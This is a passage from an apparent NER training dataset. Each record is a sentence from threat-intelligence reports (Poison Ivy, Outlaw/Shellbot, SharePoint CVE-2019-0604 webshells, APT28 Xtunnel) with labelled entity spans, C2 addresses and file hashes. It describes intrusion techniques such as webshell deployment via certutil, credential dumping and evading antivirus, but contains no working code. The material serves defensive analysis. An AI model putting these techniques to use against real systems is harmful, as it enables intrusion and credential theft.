Chinese QQ user mentioned previously and was also associated with antivirus-groups.com . 
.", "spans": [{"start": 113, "end": 126, "label": "Indicator"}, {"start": 159, "end": 161, "label": "System"}, {"start": 217, "end": 237, "label": "Indicator"}]} {"text": "org : 173.252.207.71 , 173.252.205.36 , 173.252.205.37 , 173.252.205.64 . antivirus-groups.com : 74.82.166.205 , 204.74.215.58 . domain.rm6.org : 216.131.95.22 , 222.255.28.27 . anti-virus.sytes.net : 173.252.205.36 , 173.252.205.37 , 173.252.205.64 .", "spans": [{"start": 0, "end": 3, "label": "Indicator"}, {"start": 6, "end": 20, "label": "Indicator"}, {"start": 23, "end": 37, "label": "Indicator"}, {"start": 40, "end": 54, "label": "Indicator"}, {"start": 57, "end": 71, "label": "Indicator"}, {"start": 74, "end": 94, "label": "Indicator"}, {"start": 97, "end": 110, "label": "Indicator"}, {"start": 113, "end": 126, "label": "Indicator"}, {"start": 129, "end": 143, "label": "Indicator"}, {"start": 146, "end": 159, "label": "Indicator"}, {"start": 162, "end": 175, "label": "Indicator"}, {"start": 178, "end": 198, "label": "Indicator"}, {"start": 201, "end": 215, "label": "Indicator"}, {"start": 218, "end": 232, "label": "Indicator"}, {"start": 235, "end": 249, "label": "Indicator"}]} {"text": "Several other hacker groups have also begun targeting some of the same chemical companies in this time period .", "spans": []} {"text": "Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu .", "spans": [{"start": 32, "end": 35, "label": "System"}, {"start": 40, "end": 43, "label": "System"}, {"start": 91, "end": 104, "label": "Indicator"}]} {"text": "This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users .", "spans": []} {"text": "Determining if the two groups are related is difficult , but any relationship appears unlikely .", "spans": []} {"text": "The attackers described in this document use a very basic delivery platform ; compressed self-extracting archives sometimes sent to a 
large number of recipients .", "spans": []} {"text": "The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 34, "end": 37, "label": "System"}, {"start": 42, "end": 45, "label": "System"}, {"start": 80, "end": 86, "label": "System"}]} {"text": "The Sogu gang use a custom developed threat \u2013 Backdoor.Sogu , whereas the group described in this document use an off the shelf threat \u2013 Poison Ivy .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 46, "end": 59, "label": "Indicator"}, {"start": 137, "end": 147, "label": "Malware"}]} {"text": "While the number of Sogu targets is currently small relative to the Poison Ivy attacks , we continue to monitor their activities .", "spans": [{"start": 20, "end": 24, "label": "Organization"}, {"start": 68, "end": 78, "label": "Malware"}]} {"text": "Numerous targeted attack campaigns are occurring every week .", "spans": []} {"text": "However , relative to the total number of attacks , few are fully disclosed .", "spans": []} {"text": "These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations .", "spans": []} {"text": "This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": []} {"text": "Outlaw Updates Kit to Kill Older Miner Versions , Targets More Systems .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "As we \u2019ve observed with cybercriminal groups that aim to maximize profits for every campaign , silence doesn\u2019t necessarily mean inactivity .", "spans": []} {"text": "It appears hacking group Outlaw , which has been silent for the 
past few months , was simply developing their toolkit for illicit income sources .", "spans": [{"start": 25, "end": 31, "label": "Organization"}]} {"text": "While they have been quiet since our June analysis , we observed an increase in the group \u2019s activities in December , with updates on the kits \u2019 capabilities reminiscent of their previous attacks .", "spans": []} {"text": "The updates expanded scanner parameters and targets , looped execution of files via error messages , improved evasion techniques for scanning activities , and improved mining profits by killing off both the competition and their own previous miners .", "spans": []} {"text": "We analyzed the kits , which were designed to steal information from the automotive and finance industries , launch subsequent attacks on already compromised systems , and ( possibly ) sell stolen information .", "spans": []} {"text": "Comparing this development to their previous attacks , we think Outlaw may be aiming to go after enterprises that have yet to update their systems , assessing security and changes with their previously infected hosts , finding new and old targets , and possibly testing their updates in the wild .", "spans": [{"start": 64, "end": 70, "label": "Organization"}]} {"text": "We will continue to observe the group \u2019s activities as they target industries from the United States and Europe .", "spans": []} {"text": "Based on the samples we collected and traced to 456 distinct IPs , we expect the group to be more active in the coming months as we observed changes on the versions we acquired .", "spans": []} {"text": "These new samples targeted Linux- and Unix-based operating systems , vulnerable servers , and internet of things ( IoT ) devices by exploiting known vulnerabilities with available exploits .", "spans": [{"start": 27, "end": 33, "label": "System"}, {"start": 38, "end": 48, "label": "System"}]} {"text": "This time , the group explored unpatched systems vulnerable to 
CVE-2016-8655 and Dirty COW exploit ( CVE-2016-5195 ) as attack vectors .", "spans": [{"start": 63, "end": 76, "label": "Vulnerability"}, {"start": 81, "end": 90, "label": "Vulnerability"}, {"start": 101, "end": 114, "label": "Vulnerability"}]} {"text": "Files using simple PHP-based web shells were also used to attack systems with weak SSH and Telnet credentials .", "spans": [{"start": 19, "end": 28, "label": "System"}, {"start": 83, "end": 86, "label": "Indicator"}, {"start": 91, "end": 97, "label": "Indicator"}]} {"text": "While no phishing- or social engineering-initiated routines were observed in this campaign , we found multiple attacks over the network that are considered \u201c loud. \u201d These involved large-scale scanning operations of IP ranges intentionally launched from the command and control ( C&C ) server .", "spans": [{"start": 258, "end": 277, "label": "System"}, {"start": 280, "end": 283, "label": "System"}]} {"text": "The honeynet graphs , which show activity peaks associated with specific actions , also suggest that the scans were timed .", "spans": []} {"text": "From the sample we analyzed , attacks started from one virtual private server ( VPS ) that searches for a vulnerable machine to compromise ( previous techniques used malicious URLs or infecting legitimate websites for bot propagation ) .", "spans": [{"start": 55, "end": 77, "label": "System"}, {"start": 80, "end": 83, "label": "System"}]} {"text": "Once infected , the C&C commands for the infected system launches a loud scanning activity and spreads the botnet by sending a \u201c whole kit \u201d of binary files at once with naming conventions same as the ones already in the targeted host , likely banking on breaking through via \u201c security through obscurity. 
\u201d They attempted to evade traffic inspection by encoding the code for the scanner with base-64 .", "spans": [{"start": 20, "end": 23, "label": "System"}]} {"text": "The zombie host initiates the scan \u2014 another routine from previous campaigns \u2014 but updated with a larger set of parameters and programmed to run in the background .", "spans": []} {"text": "The kit we found is in tgz format , though we have observed some samples disguised as png or jpg .", "spans": [{"start": 23, "end": 26, "label": "System"}, {"start": 86, "end": 89, "label": "System"}, {"start": 93, "end": 96, "label": "System"}]} {"text": "While previous routines took advantage of competing miners \u2019 activities and unrelated components to hijack the profit , the latest version of the code attempts to remove all related files and codes from previous infections ( including their own to make sure the running components are updated , as well as those from other cybercriminals to maximize the resources of the zombie host ) and creates a new working directory /tmp/.X19-unix to move the kit and extract the files .", "spans": []} {"text": "The tsm binary then runs in the background , forwarding a series of error messages to /dev/null to keep the code running , ensuring the continuous execution of the code referenced with a set of parameters /tmp/up.txt .", "spans": [{"start": 205, "end": 216, "label": "Indicator"}]} {"text": "The script then waits 20 minutes before it runs the wrapper script initall :", "spans": []} {"text": "2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "initall .", "spans": []} {"text": "Another variant executes a set of commands once a system is successfully compromised .", "spans": []} {"text": "Most of these commands are related to gathering information from the infected machine ( number of CPU cores , users , scheduled tasks , running processes , OS installed , and CPU and memory 
information ) via the dota3 payload , as well as changing the password to a random string also stored in /tmp/up.txt .", "spans": [{"start": 98, "end": 101, "label": "System"}, {"start": 175, "end": 178, "label": "System"}, {"start": 212, "end": 217, "label": "System"}, {"start": 295, "end": 306, "label": "Indicator"}]} {"text": "In a previous execution ( published in June 2019 ) , we observed that dota2 had its own folder but it was hardly executed .", "spans": [{"start": 70, "end": 75, "label": "System"}]} {"text": "Running the script removes the remaining files and scripts from previous attacks , keeping a low profile to evade detection .", "spans": []} {"text": "If the system has been previously infected with a cryptominer , it also attempts to kill the running miner and all its related activities .", "spans": []} {"text": "Based on a bashtemp directory of the latest sample we found , there are other compiled ELF scripts , named init and init2 , that loops the kit to keep running :", "spans": [{"start": 87, "end": 90, "label": "System"}]} {"text": "0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]} {"text": "init . 
93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]} {"text": "init2 .", "spans": []} {"text": "Both init and init2 scripts make sure all other running mining services are killed , and that all the files in the working directory are executed by giving 777 permissions .", "spans": []} {"text": "We also found the init0 script running ; the script cleans out all miners regardless of its origin .", "spans": []} {"text": "It then resets cron and removes possible cache files from other programs , starts scripts and binaries a , init0 , and start , and sets the persistence by modifying the crontab .", "spans": []} {"text": "The a binary is a script wrapper to start run , a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system .", "spans": [{"start": 50, "end": 65, "label": "System"}, {"start": 95, "end": 103, "label": "Malware"}]} {"text": "The Shellbot disguises itself as a process named rsync , commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 90, "end": 95, "label": "System"}, {"start": 100, "end": 111, "label": "System"}]} {"text": "This allows the malicious activity to evade detection .", "spans": []} {"text": "The Shellbot script is added to run after the victim \u2019s system reboots , and scripts /a/upd , /b/sync/ , and /c/aptitude/ are added to the crontab .", "spans": [{"start": 4, "end": 12, "label": "Malware"}]} {"text": "However , while we observed the presence of the codes , the functions of upd , sync and aptitude were disabled in the kits \u2019 latest version .", "spans": []} {"text": "It remains unclear whether these are leftover code from the previous versions or their particular purposes were served .", "spans": []} {"text": "Shellbot is also used to control the botnet , with a command that is sent and run from 
the C&C to determine if there is a code execution in the shell , the hostname , and its architecture .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 91, "end": 94, "label": "System"}]} {"text": "All results and system information collected from the infected system are stored locally in the device for a period before Outlaw retrieves them via the C&C .", "spans": [{"start": 123, "end": 129, "label": "Organization"}, {"start": 153, "end": 156, "label": "System"}]} {"text": "Since discovering the operations of this group in 2018 , Outlaw continues to use scripts , codes , and commands that have been previously used and deployed .", "spans": [{"start": 57, "end": 63, "label": "Organization"}]} {"text": "These routines are indicative of the group \u2019s aim to get quantitative returns through varied cybercriminal profit streams .", "spans": []} {"text": "This was also reinforced by their naming conventions , wherein different versions are simply named after the code iterations , following a specific format regardless of the actual function of the code .", "spans": []} {"text": "Trojan.SH.MALXMR.UWEJP : 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa .", "spans": [{"start": 0, "end": 22, "label": "Malware"}, {"start": 25, "end": 89, "label": "Indicator"}]} {"text": "Backdoor.SH.SHELLBOT.AA : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d .", "spans": [{"start": 0, "end": 23, "label": "Malware"}, {"start": 26, "end": 90, "label": "Indicator"}]} {"text": "Trojan.Linux.SSHBRUTE.B : 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 .", "spans": [{"start": 0, "end": 23, "label": "Malware"}, {"start": 26, "end": 90, "label": "Indicator"}]} {"text": "Coinminer.Linux.MALXMR.SMDSL32 : fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a .", "spans": [{"start": 0, "end": 30, "label": "Malware"}, {"start": 33, "end": 97, "label": "Indicator"}]} {"text": "Coinminer.Linux.MALXMR.SMDSL64 : 
649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 .", "spans": [{"start": 0, "end": 30, "label": "Malware"}, {"start": 33, "end": 97, "label": "Indicator"}]} {"text": "Actors Still Exploiting SharePoint Vulnerability to Attack Middle East Government Organizations .", "spans": [{"start": 24, "end": 34, "label": "System"}]} {"text": "On September 10 , 2019 , we observed unknown threat actors exploiting a vulnerability in SharePoint described in CVE-2019-0604 to install several webshells on the website of a Middle East government organization .", "spans": [{"start": 37, "end": 44, "label": "Organization"}, {"start": 89, "end": 99, "label": "System"}, {"start": 113, "end": 126, "label": "Vulnerability"}]} {"text": "One of these webshells is the open source AntSword webshell freely available on Github , which is remarkably similar to the infamous China Chopper webshell .", "spans": [{"start": 42, "end": 50, "label": "System"}, {"start": 80, "end": 86, "label": "System"}, {"start": 139, "end": 146, "label": "System"}]} {"text": "On January 10 , 2020 , we used Shodan to search for Internet accessible servers running versions of SharePoint vulnerable to CVE-2019-0604 .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 100, "end": 110, "label": "System"}, {"start": 125, "end": 138, "label": "Vulnerability"}]} {"text": "While admittedly the version numbers provided by SharePoint within HTTP responses do not always provide the precise SharePoint version number , we decided to use it to check if it was less than the version numbers of the patched SharePoint versions from the Microsoft advisory .", "spans": [{"start": 49, "end": 59, "label": "System"}, {"start": 67, "end": 71, "label": "Indicator"}, {"start": 116, "end": 126, "label": "System"}, {"start": 229, "end": 239, "label": "System"}, {"start": 258, "end": 267, "label": "Organization"}]} {"text": "We performed this comparison and found 28,881 servers that advertised a vulnerable version of 
SharePoint .", "spans": [{"start": 94, "end": 104, "label": "System"}]} {"text": "We did not actively check each server to verify if they were indeed vulnerable , so it is possible that many of these public-facing SharePoint servers were not vulnerable or since patched .", "spans": [{"start": 132, "end": 142, "label": "System"}]} {"text": "Regardless , the sheer number of servers and publicly available exploit code suggests that CVE-2019-0604 is still a major attack vector .", "spans": [{"start": 91, "end": 104, "label": "Vulnerability"}]} {"text": "Using this collection of webshells , the actors moved laterally to other systems on the network by dumping credentials with a variant of the notorious Mimikatz tool and using Impacket \u2019s atexec tool to use dumped credentials to run commands on other systems .", "spans": [{"start": 151, "end": 159, "label": "System"}, {"start": 175, "end": 183, "label": "System"}]} {"text": "On September 19 , 2019 , we observed the same exact Mimikatz variant uploaded to a webshell hosted at another government organization in a second country in the Middle East .", "spans": [{"start": 52, "end": 60, "label": "System"}]} {"text": "The Mimikatz variant uploaded to these two organizations is unique , as it involves a seemingly custom loader application written in .NET .", "spans": [{"start": 4, "end": 12, "label": "System"}, {"start": 133, "end": 137, "label": "System"}]} {"text": "Therefore , we believe that the same threat group is behind both intrusions .", "spans": []} {"text": "Back in April 2019 , we first observed the Emissary Panda threat group exploiting CVE-2019-0604 to install webshells on SharePoint servers at government organizations in two Middle Eastern countries .", "spans": [{"start": 43, "end": 57, "label": "Organization"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 120, "end": 130, "label": "System"}]} {"text": "Fast forward five months to the current attacks and we see exploitation of the same 
vulnerability at government organizations in two different countries compared to the April attacks .", "spans": []} {"text": "We do not have any strong ties to connect the current attacks exploiting this vulnerability in SharePoint with the Emissary Panda attacks carried out in April .", "spans": [{"start": 95, "end": 105, "label": "System"}, {"start": 115, "end": 129, "label": "Organization"}]} {"text": "The overlaps between these two sets of attacks include exploitation of a common vulnerability , similar toolset and a shared government victimology , but no strong pivot points to connect these attack campaigns together .", "spans": []} {"text": "The exploitation of this vulnerability is not unique to Emissary Panda , as multiple threat groups are using this vulnerability to exploit SharePoint servers to gain initial access to targeted networks .", "spans": [{"start": 56, "end": 70, "label": "Organization"}, {"start": 139, "end": 149, "label": "System"}]} {"text": "We would like to acknowledge the possibility of an overlap in the AntSword webshell , as we stated that Emissary Panda used China Chopper in the April attacks and AntSword and China Chopper webshells are incredibly similar .", "spans": [{"start": 66, "end": 74, "label": "System"}, {"start": 104, "end": 118, "label": "Organization"}, {"start": 130, "end": 137, "label": "System"}, {"start": 163, "end": 171, "label": "System"}, {"start": 182, "end": 189, "label": "System"}]} {"text": "However , at this time we do not believe the April attacks used AntSword based on artifacts analyzed on the SharePoint server , specifically none of the IIS logs in the April attacks used the AntSword User-Agent in requests to the webshell that were observed in the current attacks .", "spans": [{"start": 108, "end": 118, "label": "System"}, {"start": 153, "end": 156, "label": "System"}, {"start": 192, "end": 200, "label": "System"}, {"start": 201, "end": 211, "label": "System"}]} {"text": "Palo Alto Networks customers are 
protected from the threat described in this blog through Threat Prevention signatures for the exploits and C2 traffic as well as through WildFire .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 140, "end": 142, "label": "System"}, {"start": 170, "end": 178, "label": "System"}]} {"text": "More details on this protection is available in the conclusion of the report .", "spans": []} {"text": "On September 10 , 2019 , we observed an HTTP POST request to the following URL that we believe was the exploitation of CVE-2019-0604 in a publicly facing SharePoint server ( T1190 ) : /_layouts/15/picker.aspx .", "spans": [{"start": 40, "end": 44, "label": "Indicator"}, {"start": 119, "end": 132, "label": "Vulnerability"}, {"start": 154, "end": 164, "label": "System"}, {"start": 184, "end": 208, "label": "Indicator"}]} {"text": "The command uses the echo command to write a large chunk of base64 encoded data to a text file named cmd.txt .", "spans": [{"start": 101, "end": 108, "label": "Indicator"}]} {"text": "The command then uses the certutil application to convert the base64 encoded data ( T1132 ) in the cmd.txt file to c.aspx in three different SharePoint related folders .", "spans": [{"start": 99, "end": 106, "label": "Indicator"}, {"start": 115, "end": 121, "label": "Indicator"}, {"start": 141, "end": 151, "label": "System"}]} {"text": "The result of this entire command saves a variant of the Awen asp.net webshell ( T1100 ) to the SharePoint server to further interact with the compromise server .", "spans": [{"start": 57, "end": 61, "label": "System"}, {"start": 62, "end": 69, "label": "Indicator"}, {"start": 96, "end": 106, "label": "System"}]} {"text": "The Awen webshell deployed in the exploitation of this SharePoint vulnerability had a SHA256 hash of 5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21 .", "spans": [{"start": 4, "end": 8, "label": "System"}, {"start": 55, "end": 65, "label": "System"}, {"start": 101, "end": 165, "label": 
"Indicator"}]} {"text": "Just 40 seconds after the suspected exploitation of CVE-2019-0604 , we observed the first HTTP GET request to a webshell at c.aspx , which is a modified version of the freely available awen asp.net webshell .", "spans": [{"start": 52, "end": 65, "label": "Vulnerability"}, {"start": 90, "end": 94, "label": "Indicator"}, {"start": 124, "end": 130, "label": "Indicator"}, {"start": 185, "end": 189, "label": "System"}, {"start": 190, "end": 197, "label": "Indicator"}]} {"text": "We believe this HTTP GET request was the actor visiting the webshell after exploitation and prior to executing commands .", "spans": [{"start": 16, "end": 20, "label": "Indicator"}]} {"text": "The actor uses the Awen webshell to run various commands to do an initial discovery on the system and network , including user accounts ( T1033 and T1087 ) , files and folders ( T1083 ) , privileged groups ( T1069 ) , remote systems ( T1018 ) and network configuration ( T1016 ) .", "spans": [{"start": 19, "end": 23, "label": "System"}]} {"text": "Table 1 not only shows the commands used for discovery , but also the commands used to deploy another webshell to the server using the echo command to write base64 encoded data to a.txt and using the certutil application to decode and save to bitreeview.aspx .", "spans": [{"start": 180, "end": 185, "label": "Indicator"}, {"start": 243, "end": 258, "label": "Indicator"}]} {"text": "The webshell named bitreeview.aspx was saved to a folder within the SharePoint server \u2019s install path .", "spans": [{"start": 19, "end": 34, "label": "Indicator"}, {"start": 68, "end": 78, "label": "System"}]} {"text": "The bitreeview.aspx file is a variant of the AntSword webshell that has undeniably similar traits as the infamous China Chopper webshell .", "spans": [{"start": 4, "end": 19, "label": "Indicator"}, {"start": 45, "end": 53, "label": "System"}, {"start": 120, "end": 127, "label": "System"}]} {"text": "After installing this AntSword webshell , 
the actor no longer uses the Awen webshell and issues the first command to AntSword 35 seconds after the last command issued to the Awen webshell .", "spans": [{"start": 22, "end": 30, "label": "System"}, {"start": 71, "end": 75, "label": "System"}, {"start": 117, "end": 125, "label": "System"}, {"start": 174, "end": 178, "label": "System"}]} {"text": "AntSword is a modular webshell that involves a very simple webshell that the actor would deploy to the compromised server and a client application referred to as the AntSword Shell Manager .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 166, "end": 174, "label": "System"}, {"start": 175, "end": 188, "label": "System"}]} {"text": "The use of the client application differs from many other webshells that the actor would interact with in a browser window .", "spans": []} {"text": "The actor would use the AntSword Shell Manager to interact with the AntSword webshell on the compromised server , as the Shell Manager sends the appropriate script to the webshell that will execute to carry out the desired action .", "spans": [{"start": 24, "end": 32, "label": "System"}, {"start": 33, "end": 46, "label": "System"}, {"start": 68, "end": 76, "label": "System"}, {"start": 121, "end": 134, "label": "System"}]} {"text": "To provide a sense of the limited functionality within the webshell itself , the bitreeview.aspx AntSword webshell deployed in this attack ( SHA256: 15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e ) was only 162 bytes .", "spans": [{"start": 81, "end": 96, "label": "Indicator"}, {"start": 97, "end": 105, "label": "System"}, {"start": 149, "end": 213, "label": "Indicator"}]} {"text": "AntSword webshell has no functionality other than running a script provided by the AntSword Shell Manager , specifically within a field named Darr1R1ng of an HTTP POST request .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 83, "end": 91, "label": "System"}, {"start": 92, "end": 
105, "label": "System"}, {"start": 158, "end": 162, "label": "Indicator"}]} {"text": "The code above also tells us the actors had created their own custom \u201c encoder \u201d within the AntSword Shell Manager to be able to interact with the code above , which we will discuss in detail in the next section .", "spans": [{"start": 92, "end": 100, "label": "System"}, {"start": 101, "end": 114, "label": "System"}]} {"text": "In addition to the Mimikatz tool , the actor uploaded other tools to the webshell hosted at this second organization . es.exe : Mimikatz with custom loader , da53dcaeede03413ba02802c4be10883c4c28d3d28dee11734f048b90eb3d304 .", "spans": [{"start": 19, "end": 27, "label": "System"}, {"start": 119, "end": 125, "label": "Indicator"}, {"start": 128, "end": 136, "label": "System"}, {"start": 158, "end": 222, "label": "Indicator"}]} {"text": "Rar.exe : Legitimate WinRAR , 26d9212ec8dbca45383eb95ec53c05357851bd7529fa0761d649f62e90c4e9fd . atec.exe : Compiled Impacket atexec tool , a4aca75bcc8f18b8a2316fd67a7e545c59b871d32de0b325f56d22584038fa10 . 
dmp.exe : Dumpert tool , e4e05c9a216c2f2b3925293503b5d5a892c33db2f6ea58753f032b80608c3f2e .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}, {"start": 21, "end": 27, "label": "System"}, {"start": 30, "end": 94, "label": "Indicator"}, {"start": 97, "end": 105, "label": "Indicator"}, {"start": 117, "end": 125, "label": "System"}, {"start": 140, "end": 204, "label": "Indicator"}, {"start": 207, "end": 214, "label": "Indicator"}, {"start": 217, "end": 224, "label": "System"}, {"start": 232, "end": 296, "label": "Indicator"}]} {"text": "One of the tools seen above that caught our interest was the Dumpert tool , which is freely available on Outflanknl \u2019s GitHub repository .", "spans": [{"start": 61, "end": 68, "label": "System"}, {"start": 105, "end": 115, "label": "System"}, {"start": 119, "end": 125, "label": "System"}]} {"text": "The author of Dumpert describes the tool as an LSASS dumping tool that uses direct system calls and API unhooking to evade antivirus and EDR solutions .", "spans": [{"start": 14, "end": 21, "label": "System"}, {"start": 47, "end": 52, "label": "System"}, {"start": 137, "end": 140, "label": "System"}]} {"text": "Dumpert is a relatively new tool with its initial commit to GitHub occurring on June 17 , 2019 .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 60, "end": 66, "label": "System"}]} {"text": "While the Dumpert tool is meant to help red teams emulate an adversary , we had not seen this tool used by threat actors until it was uploaded to this related webshell on September 23 , 2019 .", "spans": [{"start": 10, "end": 17, "label": "System"}]} {"text": "Threat actors continue to exploit the CVE-2019-0604 vulnerability to compromise SharePoint servers , which is a vulnerability that Microsoft released a patch for in March 2019 .", "spans": [{"start": 38, "end": 51, "label": "Vulnerability"}, {"start": 80, "end": 90, "label": "System"}, {"start": 131, "end": 140, "label": "Organization"}]} {"text": "We observed 
actors installing webshells to the SharePoint server that they use to run commands and upload additional tools to in order to dump credentials and move laterally to other systems on the network .", "spans": [{"start": 47, "end": 57, "label": "System"}]} {"text": "We were also able to find a related webshell based on the threat group \u2019s tool reuse , specifically a custom Mimikatz sample .", "spans": [{"start": 109, "end": 117, "label": "System"}]} {"text": "Thanks to this tool reuse , we found the threat group uploading a credential dumping tool called Dumpert that we had not seen used in prior incidents involving the exploitation of CVE-2019-0604 .", "spans": [{"start": 97, "end": 104, "label": "System"}, {"start": 180, "end": 193, "label": "Vulnerability"}]} {"text": "Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag .", "spans": [{"start": 106, "end": 115, "label": "Organization"}]} {"text": "Two suspicious artifacts have been retrieved from two separate servers within the Die Linke infrastructure .", "spans": []} {"text": "One is an open source utility used to remotely issue commands on a Windows host from a Linux host .", "spans": [{"start": 67, "end": 74, "label": "System"}, {"start": 87, "end": 92, "label": "System"}]} {"text": "The other is a custom utility which , despite its large size , has limited functionality and acts as a tunnel , possibly used by the attackers to maintain persistence within the compromised network .", "spans": []} {"text": "Attributes of one of the artifacts and intelligence gathered on the infrastructure operated by the attackers suggest that the attack was perpetrated by a state-sponsored group known as Sofacy ( or APT28 ) .", "spans": [{"start": 185, "end": 191, "label": "Organization"}, {"start": 197, "end": 202, "label": "Organization"}]} {"text": "Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin 
.", "spans": [{"start": 43, "end": 50, "label": "Organization"}]} {"text": "The first artifact \u2013 identified across this report as Artifact #1 \u2013 has the following attributes :", "spans": []} {"text": "Name winexesvc.exe Size 23552 MD5 77e7fb6b56c3ece4ef4e93b6dc608be0 SHA1 f46f84e53263a33e266aae520cb2c1bd0a73354e SHA256 5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d .", "spans": [{"start": 5, "end": 18, "label": "Indicator"}, {"start": 34, "end": 66, "label": "Indicator"}, {"start": 72, "end": 112, "label": "Indicator"}, {"start": 120, "end": 184, "label": "Indicator"}]} {"text": "The second artifact \u2013 identified across this report as Artifact #2 \u2013 -has the following attributes :", "spans": []} {"text": "Name svchost.exe Size 1062912 MD5 5e70a5c47c6b59dae7faf0f2d62b28b3 SHA1 cdeea936331fcdd8158c876e9d23539f8976c305 SHA256 730a0e3daf0b54f065bdd2ca427fbe10e8d4e28646a5dc40cbcfb15e1702ed9a Compile Time 2015-04-22 10:49:54 .", "spans": [{"start": 5, "end": 16, "label": "Indicator"}, {"start": 34, "end": 66, "label": "Indicator"}, {"start": 72, "end": 112, "label": "Indicator"}, {"start": 120, "end": 184, "label": "Indicator"}]} {"text": "Artifact #1 was retrieved from a File Server operated by Die Linke .", "spans": [{"start": 33, "end": 44, "label": "System"}]} {"text": "The file is a 64bit-compatible compiled binary of the open source utility Winexe .", "spans": [{"start": 74, "end": 80, "label": "System"}]} {"text": "Winexe is software similar to the more popular PSExec and is designed to allow system administrators to execute commands on remote servers .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 47, "end": 53, "label": "System"}]} {"text": "While commercial solutions like Symantec pcAnywhere provide a larger feature-set , Winexe is lightweight , and doesn\u2019t require any installation or configuration .", "spans": [{"start": 32, "end": 40, "label": "Organization"}, {"start": 83, "end": 89, "label": 
"System"}]} {"text": "One of the reasons Winexe is preferred over PSExec , is that it provides a Linux client , while PSExec doesn\u2019t .", "spans": [{"start": 19, "end": 25, "label": "System"}, {"start": 44, "end": 50, "label": "System"}, {"start": 75, "end": 80, "label": "System"}, {"start": 96, "end": 102, "label": "System"}]} {"text": "Attackers are making growing use of utilities like Winexe and PSExec to perform lateral movement across compromised networks .", "spans": [{"start": 51, "end": 57, "label": "System"}, {"start": 62, "end": 68, "label": "System"}]} {"text": "Besides providing the ability to execute arbitrary commands on the target system , these utilities normally don\u2019t raise suspicion as they are commonly whitelisted by Antivirus and other commercial security software .", "spans": []} {"text": "Winexe acts as a Windows service that can be configured to automatically start at boot and silently wait for incoming commands over a named pipe .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 17, "end": 24, "label": "System"}]} {"text": "Named pipes are a Windows inter-process communication method .", "spans": [{"start": 18, "end": 25, "label": "System"}]} {"text": "Through named pipes , processes are able to communicate and exchange data even over a network .", "spans": []} {"text": "In the case of Artifact #1 , the name of the pipe is ahexec , computers over the network could access the pipe server by simply opening a file handle on \\ServerNamepipeahexec .", "spans": []} {"text": "Once connected to the pipe , a user or a program can easily provide information required to execute command ( just as they would normally through a command-line ) .", "spans": []} {"text": "The provided information is then passed to a CreateProcessAsUserA call and the specified command is executed .", "spans": []} {"text": "Once inside the network , Artifact #1 can be enough for the attacker to download or create additional scripts , execute commands 
and exfiltrate data ( for example , simply through ftp ) .", "spans": [{"start": 180, "end": 183, "label": "Indicator"}]} {"text": "It is plausible that Artifact #1 could be present on other servers under different names , although it is also likely that the attacker only left it on servers to which they required maintainenance of persistent access .", "spans": []} {"text": "Artifact #2 was recovered from the Admin Controller operated by Die Linke .", "spans": [{"start": 35, "end": 51, "label": "System"}]} {"text": "This is custom malware , which despite large file size ( 1,1 MB ) , provides limited functionality .", "spans": []} {"text": "Artifact #2 operates as a backchannel for the attacker to maintain a foothold inside the compromised network .", "spans": []} {"text": "The properties of the artifact show that the same authors of the malware seem to have called it Xtunnel .", "spans": [{"start": 96, "end": 103, "label": "Malware"}]} {"text": "As the same name suggests , the artifact appears in fact to act as a tunnel for the attacker to remotely access the internal network and maintain persistence .", "spans": []} {"text": "After initialization , the artifact will attempt to establish a connection by creating a socket .", "spans": []} {"text": "In case of failure , it will sleep for three seconds and try again .", "spans": []} {"text": "The authors of the malware didn\u2019t appear to have spent any effort in concealing indicators or obfuscating code \u2013 the IP address with which it tries to communicate is hardcoded in clear-text inside the binary .", "spans": []} {"text": "We can observe below , the procedure through which the artifact attempts to establish a connection with the IP address 176.31.112.10 .", "spans": [{"start": 119, "end": 132, "label": "Indicator"}]} {"text": "This specific IP address is a critical piece of information that enables us to connect this attack to a spree of previous targeted campaigns .", "spans": []} {"text": "The details of 
